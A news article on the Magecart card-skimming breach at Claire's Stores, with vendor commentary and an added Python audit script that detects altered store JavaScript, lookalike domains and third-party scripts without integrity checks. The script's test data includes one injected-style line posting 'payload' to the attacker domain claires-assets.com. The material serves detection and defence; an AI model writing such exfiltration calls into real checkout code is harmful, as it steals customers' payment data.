Accessories retailer Claire's Stores suffered a data breach on its e-commerce website in which, in a typical Magecart attack, a payment skimmer was injected into the site's checkout and used to steal customers' card data.
Claire’s Stores announced on March 17th it would temporarily close all of its North American stores, due to the COVID-19 pandemic.
According to Sansec, which identified the attack, on March 21st the domain claires-assets.com was registered by an anonymous party. In the last week of April, malicious code was added to the online stores of Claire’s and its sister brand Icing. The injected code would intercept any customer information that was entered during checkout, and send it to the claires-assets.com server.
Sansec found the malware was present until June 13th. Claire's has since removed the altered code.
“The timeline may indicate that attackers anticipated a surge in online traffic following the lockdown,” Sansec wrote. “The period between exfil domain registration and actual malware suggests that it took the attackers a good four weeks to gain access to the store.”
“The FBI recently released a Private Industry Notification (PIN) about a large number of lookalike domain names registered recently, in this case targeting airports in the United States. These domains can be used to trick reviewers and end-users into believing the malware is legitimate first-party code. A similar lookalike domain was used in the British Airways Magecart attack that resulted in a $230M fine for the company.
“Businesses cannot rely on domain name safelists alone to protect against client-side risks such as Magecart. They need to use client-side application protection solutions to ensure malicious code is discovered and removed before it leads to compliance penalties and brand damage.”
Claire’s made the following statement regarding the attack:
“Claire’s cares about protecting its customers’ data. On Friday, we identified an issue related to our e-commerce platform and took immediate action to investigate and address it. Our investigation identified the unauthorized insertion of code to our e-commerce platform designed to obtain payment card data entered by customers during the checkout process. We removed that code and have taken additional measures to reinforce the security of our platform. We are working diligently to determine the transactions that were involved so that we can notify those individuals. Cards used in our retail stores were not affected by this issue. We have also notified the payment card networks and law enforcement. It is always advisable for cardholders to monitor their account statements for unauthorized charges. The payment card network rules generally provide that cardholders are not responsible for unauthorized charges that are timely reported.”
“There are several prevention techniques for Magecart attacks, and of course the attacks constantly evolve,” notes Brent Johnson, CISO at Bluefin. “Depending on the size and sophistication of a website, prevention can become very difficult. Deploying a File Integrity Monitoring (FIM) solution on the retailer’s website that detects changes to hosted content/files is a good place to start; however, that doesn’t help if the site relies on third-party code for hosted features (such as chat windows, shopping carts, etc.). If your site relies on code from a third party that’s been infected, the result is the same.”
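The two detection ideas above, a file-integrity baseline over the store's own JavaScript and the caveat that third-party scripts fall outside it, can be combined in a small audit script. The following is an added example, not code from the article, from Sansec, or from Bluefin: it hashes the hosted files against a known-good baseline, and for any changed or new file it lists the hosts the file talks to, flagging anything not on a first-party allowlist and specifically calling out brand lookalike domains of the kind used here (claires-assets.com is the exfiltration domain Sansec reported; the allowlist, file contents, HTML snippet and vendor hostnames are constructed for the demo). A second check scans the page HTML for third-party `<script>` tags that lack a Subresource Integrity (`integrity=`) attribute, which is the gap FIM cannot see.

```python
"""File-integrity plus outbound-host audit for hosted store JavaScript.

Added example, not part of the article or of any vendor's product. All
file contents, hostnames and the allowlist below are constructed for the
demo; only claires-assets.com is taken from the reporting on the attack.
"""
import hashlib
import re
from typing import Dict, List, Tuple

# Hypothetical allowlist: hosts first-party pages may load from or send data to.
ALLOWED_HOSTS = {"www.claires.com", "cdn.claires.com", "www.icing.com"}

# Brand tokens used to spot lookalike domains such as claires-assets.com,
# which contain the brand name but are not first-party hosts.
BRAND_TOKENS = ("claires", "icing")

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)
SCRIPT_RE = re.compile(r"<script\b[^>]*\bsrc=[\"']([^\"']+)[\"'][^>]*>", re.IGNORECASE)


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_baseline(files: Dict[str, bytes]) -> Dict[str, str]:
    """Record one hash per hosted file at a known-good point (e.g. at deploy)."""
    return {path: sha256_hex(content) for path, content in files.items()}


def changed_files(baseline: Dict[str, str], current: Dict[str, bytes]) -> List[str]:
    """Paths whose content no longer matches the baseline, including new files."""
    return sorted(p for p, c in current.items() if baseline.get(p) != sha256_hex(c))


def external_hosts(js: bytes) -> List[str]:
    """Hostnames of every absolute http(s) URL mentioned in a script."""
    return sorted({h.lower() for h in URL_RE.findall(js.decode("utf-8", "replace"))})


def is_lookalike(host: str) -> bool:
    """A non-allowlisted host that still carries the brand name in it."""
    return host not in ALLOWED_HOSTS and any(tok in host for tok in BRAND_TOKENS)


def audit(baseline: Dict[str, str], current: Dict[str, bytes]) -> List[Tuple[str, str, str]]:
    """(path, host, reason) for each suspicious host referenced by a changed file."""
    findings = []
    for path in changed_files(baseline, current):
        for host in external_hosts(current[path]):
            if host in ALLOWED_HOSTS:
                continue
            reason = "lookalike brand domain" if is_lookalike(host) else "host not on allowlist"
            findings.append((path, host, reason))
    return findings


def third_party_scripts_without_sri(html: str) -> List[str]:
    """External script URLs loaded without an integrity= (SRI) attribute.

    Same-origin scripts are skipped: those are covered by the file-hash check.
    """
    out = []
    for m in SCRIPT_RE.finditer(html):
        tag, src = m.group(0), m.group(1)
        host_m = URL_RE.match(src)
        if not host_m or host_m.group(1).lower() in ALLOWED_HOSTS:
            continue
        if "integrity=" not in tag.lower():
            out.append(src)
    return out


# Constructed sample data: a known-good deploy and the current on-disk state.
KNOWN_GOOD = {
    "js/checkout.js": b"// checkout logic (constructed)\nfetch('https://www.claires.com/api/cart');\n",
    "js/vendor.js": b"console.log('vendor');\n",
}
CURRENT = {
    "js/checkout.js": KNOWN_GOOD["js/checkout.js"]
    + b"/* injected */ fetch('https://claires-assets.com/collect', {method: 'POST', body: payload});\n",
    "js/vendor.js": KNOWN_GOOD["js/vendor.js"],
    "js/new.js": b"new Image().src = 'https://example-cdn.net/px.gif';\n",
}
SAMPLE_HTML = (
    '<script src="/js/checkout.js"></script>'
    '<script src="https://chat.example-vendor.com/widget.js"></script>'
    '<script src="https://cdn.example.org/lib.js" integrity="sha384-AAAA" crossorigin="anonymous"></script>'
)

if __name__ == "__main__":
    for path, host, reason in audit(build_baseline(KNOWN_GOOD), CURRENT):
        print(f"{path}: {host} ({reason})")
    for src in third_party_scripts_without_sri(SAMPLE_HTML):
        print(f"third-party script without SRI: {src}")
```

Run against the constructed data, the audit reports `js/checkout.js` contacting `claires-assets.com` (lookalike brand domain) and the new `js/new.js` contacting `example-cdn.net` (not on the allowlist), and the HTML check flags the chat widget, which is exactly the kind of vendor-hosted feature Johnson describes. SRI only helps when the vendor serves a fixed file; a widget that updates itself will break the hash, so for those a Content Security Policy restricting `script-src` and `connect-src` to known hosts, plus periodic checks of the rendered page, is the practical backstop.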
Attackers know that shoppers are going online more during the coronavirus pandemic, and retailers need to protect themselves accordingly. Research from SiteLock found that a third (32%) of customers stop shopping with a retailer from which their information was stolen, and that a majority of shoppers (56%) take about a month to return to shopping with any online retailer after a breach.